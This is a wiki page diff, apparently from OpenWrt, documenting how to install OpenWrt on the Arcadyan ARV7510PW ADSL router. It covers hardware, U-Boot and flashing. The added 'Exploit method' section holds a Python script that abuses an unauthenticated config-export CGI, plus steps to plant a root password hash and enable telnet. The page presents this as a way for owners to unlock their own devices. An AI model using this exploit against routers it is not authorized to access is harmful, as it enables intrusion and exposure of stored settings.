Differences
This shows you the differences between two versions of the page.
|
toh:arcadyan:arv7510pw [2013/02/20 11:32] malaakso |
toh:arcadyan:arv7510pw [2013/05/13 09:52] (current) malaakso |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Arcadyan ARV7510PW ====== | ====== Arcadyan ARV7510PW ====== | ||
| - | **Work in progress!** | + | The ARV7510PW is an ADSL2+ router with 802.11n wireless commonly obtained via the Finnish ISP Elisa (Elisa kotiboksi). It is a rebranded Bewan Ibox. There is also another similar device based on Arcadyan ARV4510PW. The only difference seems to be the wireless mini-PCI card, which in ARV4510PW is only 802.11bg capable (Atheros AR241x). From outside these can be distinguished by the antenna color: ARV7510PW has a black antenna, ARV4510PW white. There exists also an all-black ARV4510PW, the Wippies Homebox. Finally, there are also ARV4510PW models where the wireless chip is not on a mini-PCI card, but rather soldered directly on the main board. The wireless in these models is not (yet) supported due to the missing EEPROM. |
| - | + | ||
| - | The ARV7510PW is an ADSL2+ router with 802.11n wireless commonly obtained via the Finnish ISP Elisa (Elisa kotiboksi). It is a rebranded Bewan Ibox. There is also another similar device based on Arcadyan ARV4510PW. The only difference seems to be the wireless mini-PCI card, which in ARV4510PW is only 802.11bg capable (Atheros AR5212). From outside these can be distinguished by the antenna color: ARV7510PW has a black antenna, ARV4510PW white. | + | |
| ===== OpenWRT Status ===== | ===== OpenWRT Status ===== | ||
| - | OpenWrt runs perfectly with some additional patches (see below). Installation requires a serial connection. The router is practically unbrickable by virtue of the UART boot capability. | + | OpenWrt runs perfectly with some additional patches (see below). Installation may require a serial connection. The router is practically unbrickable by virtue of the UART boot capability. |
| ===== Hardware ===== | ===== Hardware ===== | ||
| Line 37: | Line 35: | ||
| [[http://ltl.tkk.fi/~malaakso/misc/0030-MIPS-add-board-support-for-Arcadyan-ARV7510.patch|U-Boot patch]] | [[http://ltl.tkk.fi/~malaakso/misc/0030-MIPS-add-board-support-for-Arcadyan-ARV7510.patch|U-Boot patch]] | ||
| - | In addition the OpenWrt Makefile must be modified to produce images for ARV7510PW. | + | In addition the OpenWrt Makefiles must be modified to produce images for ARV7510PW: [[http://ltl.tkk.fi/~malaakso/misc/profiles.diff|OpenWrt diff]] |
| - | **Attention:** The current U-Boot has broken ethernet and TFTP does not work! As a workaround images can be transmitted with Y-Modem protocol using ''loady''. | + | Pre-built images (includes Luci and kmod-ath5k for 4510 models) are available: |
| + | [[http://ltl.tkk.fi/~malaakso/misc/openwrt-lantiq-arv7510pw_ram-u-boot.asc|U-Boot RAM image]] | ||
| + | [[http://ltl.tkk.fi/~malaakso/misc/openwrt-lantiq-arv7510pw_nor-u-boot.img|U-Boot flash image]] | ||
| + | [[http://ltl.tkk.fi/~malaakso/misc/openwrt-lantiq-danube-ARV7510PW-squashfs.image|OpenWrt image]] | ||
| ===== Installation ===== | ===== Installation ===== | ||
| + | |||
| + | ==== Exploit method ==== | ||
| + | |||
| + | Older versions of the original firmware have a security exploit, which gives access to a flat text version of the router settings. | ||
| + | |||
| + | Run this python3 script to check if the router is vulnerable | ||
| + | <code> | ||
| + | import urllib.request | ||
| + | req = urllib.request.Request('http://192.168.1.1/cgi-bin/export.cgi?Save=%3E+Back+up+your+parameterss&sExportMode=text&iExpert=3&sSuccessPage=backup.htm&sErrorPage=backup.htm') | ||
| + | req.add_header('Referer', 'http://192.168.1.1/en_US/admin/backup.htm') | ||
| + | r = urllib.request.urlopen(req) | ||
| + | f = open('router.txt', 'wb') | ||
| + | f.write(r.read()) | ||
| + | f.close() | ||
| + | </code> | ||
| + | If it doesn't produce any errors: | ||
| + | - Open the produced router.txt with your favourite editor. | ||
| + | - Set UserTable_1_Unix_Enable to 1 | ||
| + | - Set UserTable_1_Unix_Password to $1$xopJA6FB$fJnqEswAbH0SDg.sPLUKf. | ||
| + | - Set Services_Telnet_Enable to 1 | ||
| + | - Save the file and upload as you would with a standard backup | ||
| + | |||
| + | Do not continue if you aren't willing or able to use UART method: | ||
| + | - Copy ''openwrt-lantiq-arv7510pw_nor-u-boot.img'' and ''openwrt-lantiq-danube-ARV7510PW-squashfs.image'' onto a fat32 usb drive | ||
| + | - Plug the usb drive into the router | ||
| + | - telnet into the router as root with password as password | ||
| + | - cd into the usb drive (can be found with mount) | ||
| + | - umount /dev/rd/0 | ||
| + | - dd if=/dev/mtd/0 bs=1 of=routerBackup.bin | ||
| + | - dd if=openwrt-lantiq-arv7510pw_nor-u-boot.img bs=1 of=/dev/mtdblock/0 | ||
| + | - dd if=openwrt-lantiq-danube-ARV7510PW-squashfs.image bs=1 seek=393216 of=/dev/mtdblock/0 | ||
| + | - wait a while | ||
| + | - reboot | ||
| + | |||
| + | |||
| + | ==== UART method ==== | ||
| The installation procedure in short: | The installation procedure in short: | ||
| Line 50: | Line 87: | ||
| - Use the installed U-Boot to install OpenWrt to flash | - Use the installed U-Boot to install OpenWrt to flash | ||
| - | ==== Preparation ==== | + | === Preparation === |
| You need a RS232-to-TTL cable connected to the serial header shown in the picture below. Short the UART boot pins with two jumper caps. | You need a RS232-to-TTL cable connected to the serial header shown in the picture below. Short the UART boot pins with two jumper caps. | ||
| Line 56: | Line 93: | ||
| {{:media:arv7510pw_top.jpg|}} | {{:media:arv7510pw_top.jpg|}} | ||
| - | Start TFTP server on your computer and copy ''u-boot.img'' and ''openwrt-lantiq-danube-ARV7510PW-squashfs.image'' to the TFTP server root. Connect your computer to the router with an ethernet cable and configure the IP address to 192.168.0.2, netmask 255.255.255.0. | + | Start TFTP server on your computer and copy ''openwrt-lantiq-arv7510pw_nor-u-boot.img'' and ''openwrt-lantiq-danube-ARV7510PW-squashfs.image'' to the TFTP server root. Connect your computer to the router with an ethernet cable and configure the IP address to 192.168.1.2, netmask 255.255.255.0. |
| - | ==== Loading U-Boot ==== | + | === Loading U-Boot === |
| Use 115200 bps, 8-N-1, no flow control, as the serial connection parameter. | Use 115200 bps, 8-N-1, no flow control, as the serial connection parameter. | ||
| Line 72: | Line 109: | ||
| on the serial output. | on the serial output. | ||
| - | Send ''u-boot.asc'' as raw ascii to the router. U-Boot should start. Press any key to stop autoboot. At this point you can make a backup of the original firmware using ''md.l 0xb0000000 0x1000000'' and logging the output (takes roughly 2 hours). The flash can be erased by issuing first ''protect off all'' and then ''erase all''. Use ''tftp 0x80700000 u-boot.img'' to transfer the actual U-Boot image to memory. Write it to flash using ''cp.l 0x80700000 0xb0000000 0x40000''. Power off the router and remove the jumper caps from UART boot pins. | + | Send ''openwrt-lantiq-arv7510pw_ram-u-boot.asc'' as raw ascii to the router. U-Boot should start. Press any key to stop autoboot. At this point you can make a backup of the original firmware using ''md.l 0xb0000000 0x1000000'' and logging the output (takes roughly 2 hours). The flash can be erased by issuing first ''protect off all'' and then ''erase all''. Use first ''setenv ipaddr 192.168.1.1'', ''setenv serverip 192.168.1.2'' and ''setenv ethaddr xx:xx:xx:xx:xx:xx'' (ethernet address can be found from the sticker on top of the switch ports) to configure the network, and then ''tftp 0x80700000 openwrt-lantiq-arv7510pw_nor-u-boot.img'' to transfer the actual U-Boot image to memory. Write it to flash using ''cp.b 0x80700000 0xb0000000 ${filesize}''. Power off the router and remove the jumper caps from UART boot pins. |
| - | ==== Loading OpenWrt ==== | + | === Loading OpenWrt === |
| - | Power on the router. The U-Boot installed in the previous step should start. Press any key to stop autoboot. Use ''setenv ethaddr xx:xx:xx:xx:xx:xx'' to configure your MAC address. It can be found from the sticker on top of the ethernet ports. Use ''saveenv'' to save it to flash. Use ''tftp 0x80700000 openwrt-lantiq-danube-ARV7510PW-squashfs.image'' to transfer the actual U-Boot image to memory. Write it to flash using ''cp.l 0x80700000 0xb0060000 0x340004''. Use ''reset'' to reset the board. Watch as U-Boot loads OpenWrt and proceed to configure it to your liking! | + | Power on the router. The U-Boot installed in the previous step should start. Press any key to stop autoboot. Use again ''setenv ipaddr 192.168.1.1'', ''setenv serverip 192.168.1.2'' and ''setenv ethaddr xx:xx:xx:xx:xx:xx'' to configure the network. Use ''saveenv'' to save these to flash. Use ''tftp 0x80700000 openwrt-lantiq-danube-ARV7510PW-squashfs.image'' to transfer the actual U-Boot image to memory. Write it to flash using ''cp.b 0x80700000 0xb0060000 ${filesize}''. Use ''reset'' to reset the board. Watch as U-Boot loads OpenWrt and proceed to configure it to your liking! |
| ===== Deficiencies of the default OpenWrt configuration ===== | ===== Deficiencies of the default OpenWrt configuration ===== | ||
| Line 86: | Line 123: | ||
| ===== Hardware notes ===== | ===== Hardware notes ===== | ||
| - | The internal switch port numbering is opposite from the one printed on the box. Port 0 corresponds to the port labeled as number 4, "WAN/Uplink". Port 5 is connected to the CPU. If you wish to use the uplink port as WAN, you need a VLAN config | + | The internal switch port numbering is opposite from the one printed on the box. Port 0 corresponds to the port labeled as "Port 4/Uplink". Port 5 is connected to the CPU. If you wish to use the uplink port as WAN, you need a VLAN config |
| <code> | <code> | ||
| + | config switch "eth0" | ||
| + | option reset 1 | ||
| + | option enable_vlan 1 | ||
| + | |||
| config switch_vlan "eth0_1" | config switch_vlan "eth0_1" | ||
| option device eth0 | option device eth0 | ||
| Line 108: | Line 149: | ||
| By default the device runs Linux 2.6.16. The serial console does not accept any input, and there is no telnet or ssh available. The web interface of the original firmware is extremely limited, and the configuration is done remotely by ISP via TR-069. There is a local firmware update page, but it doesn't accept third party firmwares. | By default the device runs Linux 2.6.16. The serial console does not accept any input, and there is no telnet or ssh available. The web interface of the original firmware is extremely limited, and the configuration is done remotely by ISP via TR-069. There is a local firmware update page, but it doesn't accept third party firmwares. | ||
| - | The original firmware is not encrypted or obfuscated in any way, contrary to many other Arcadyan devices. Therefore it might be easy to produce acceptably packaged firmwares. For people with MIPS (dis)assembly skills, here is the [[http://ltl.tkk.fi/~malaakso/misc/firmware.cgi|cgi script]] and the [[http://ltl.tkk.fi/~malaakso/misc/fwburn|firmware flash tool]] extracted from the original firmware. | + | The original firmware is not encrypted or obfuscated in any way, contrary to many other Arcadyan devices. Therefore it might be easy to produce acceptably packaged firmwares. Adding a header like in the original firmware might be enough. For people with MIPS (dis)assembly skills, here is the [[http://ltl.tkk.fi/~malaakso/misc/firmware.cgi|cgi script]] and the [[http://ltl.tkk.fi/~malaakso/misc/fwburn|firmware flash tool]] extracted from the original firmware. |
| The ''ART'' partition contains the squashfs file system of the actual firmware. Partition ''Config'' contains a writable ext2 file system, where configuration is kept. During firmware update ''OldFirmware'' is replaced and marked ''Firmware'', and ''Firmware'' becomes ''OldFirmware''. | The ''ART'' partition contains the squashfs file system of the actual firmware. Partition ''Config'' contains a writable ext2 file system, where configuration is kept. During firmware update ''OldFirmware'' is replaced and marked ''Firmware'', and ''Firmware'' becomes ''OldFirmware''. | ||
toh/arcadyan/arv7510pw.1361356355.txt.bz2 · Last modified: 2013/02/20 11:32 by malaakso